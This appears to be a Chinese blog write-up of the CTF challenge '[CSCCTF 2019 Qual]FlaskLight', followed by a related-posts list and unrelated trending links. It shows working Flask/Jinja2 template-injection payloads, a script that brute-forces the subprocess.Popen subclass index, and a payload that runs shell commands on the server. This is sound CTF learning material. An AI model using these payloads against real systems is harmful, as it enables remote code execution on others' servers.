这个根据题目名字,flask模板注入,找注入点

查看源码发现GET传参
直接测试模板注入

常规模板注入
试了试之前做过的模板注入,都行不通
然后百度了一波,原来这是python2的
难怪不行

{{''.__class__.__mro__[2].__subclasses__()}}

利用这个可以读取所有的类,然后看看能不能RCE
找到catch_warnings类,

但是无法RCE
看了wp,发现可以利用subprocess.Popen这个类来进行RCE
学废了
网上搜的模板注入,都没说这个类,emmmm
找索引

import requests
import html
import timefor i in range(0,300):time.sleep(0.06)url='http://4d0aed10-26a2-4108-8b17-9c8aa555ca2d.node3.buuoj.cn?search={{\'\'.__class__.__mro__[2].__subclasses__()[%d]}}' %(i)r = requests.get(url)print(url)if "subprocess.Popen" in html.unescape(r.text):print(i)break


索引为258
payload

{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

查看flasklight目录

另外一个就是flag

[CSCCTF 2019 Qual]FlaskLight 记录相关推荐

  1. 一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI

    目录 SSTI 无二次渲染的示例 存在二次渲染的示例 漏洞复现 [CSCCTF 2019 Qual]FlaskLight 做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是 ...

  2. [CSCCTF 2019 Qual] FlaskLight

    信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程 ...

  3. [CSCCTF 2019 Qual]FlaskLight——直取flag?

    [CSCCTF 2019 Qual]FlaskLight 前言 白天一直在上课,晚上赶快躲进图书馆里面打打靶场.这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强 ...

  4. ssti练习之[CSCCTF 2019 Qual]FlaskLight 1

    [CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示 尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.n ...

  5. BUUCTF:[CSCCTF 2019 Qual]FlaskLight

    题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?searc ...

  6. [CSCCTF 2019 Qual]FlaskLight SSTI注入

    进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49 ...

  7. Good Bye 2019补题记录

    Good Bye 2019补题记录 A. Card Game 题目描述 Two players decided to play one interesting card game. There is ...

  8. 【读书】2019年阅读记录

    主要记录个人今年的阅读情况,以及部分带有强烈主观思想的读书笔记输出(按大致的时间顺序).如果有好书,请给我分享快乐哦~ 阅读工具:微信阅读(90%).Kindle(最近拾起,并在家使用) 备注:什么心 ...

  9. 2019年读书记录及总结

    时间戳: 阅读方式: 所得所想: 1.<图解HTTP协议>作者:不详 时间戳:2019.0601--20190801 阅读方式:PC端读完第一遍 所得所想:对HTTP协议及请求行.请求头. ...

最新文章

  1. Permission denied (publickey). fatal: Could not read from remote repository.
  2. jbehave_使用JBehave,Gradle和Jenkins的行为驱动开发(BDD)
  3. c语言主调函数和被调函数,在C语言中,何为主调函数和被调函数,他们之 – 手机爱问...
  4. linux系统无法识别固态硬盘_linux查看硬盘是不是ssd
  5. 【渝粤题库】陕西师范大学292081 管理学基础 作业(高起专)
  6. windows CA的几点记录小结
  7. 阶段1 语言基础+高级_1-3-Java语言高级_05-异常与多线程_第6节 Lambda表达式_6_Lambda表达式有参数有返回值的...
  8. 删改数据如何避免锁表?等等,啥是锁呀
  9. 系统集成项目管理工程师知识点
  10. 智能硬件再下一城:家居
  11. estore简版商城
  12. 常用模板 UPD12/4
  13. 【云原生之Docker实战】使用Docker部署OpenKM文档管理系统
  14. ping命令和查找计算机,ping命令查网速,电脑测网速ping命令
  15. 有机合成化学类毕业论文文献(推荐10篇)
  16. 解决Win10 无线显示器功能安装时失败
  17. uml的九种图例分析
  18. 数据库中LIMIT和 OFFSET的理解
  19. 淘宝天猫商家运营,宝贝标题如何突出卖点,标题编写方法小技巧
  20. Web安全—脚本木马工作原理(持续更新)

热门文章

  1. 计算机 smb共享,文件大师SMB共享使用方法
  2. 基于Java的石头迷阵小游戏的设计与实现
  3. 基于单片机的秒表计时器系统设计(#0400)
  4. 移动软件开发定制那些事
  5. 【USB笔记】查询VID对应的USB设备厂商
  6. deeplearning4j的官网
  7. linux中zip文件解压命令,Linux中zip压缩和unzip解压缩命令使用方法
  8. 你离黑客的距离,就差这20个神器
  9. 图纸设计管理平台,彩虹图纸管理软件设计管理功能
  10. 腾讯、移动持续大手笔回购,港股龙头“带动”市场反弹?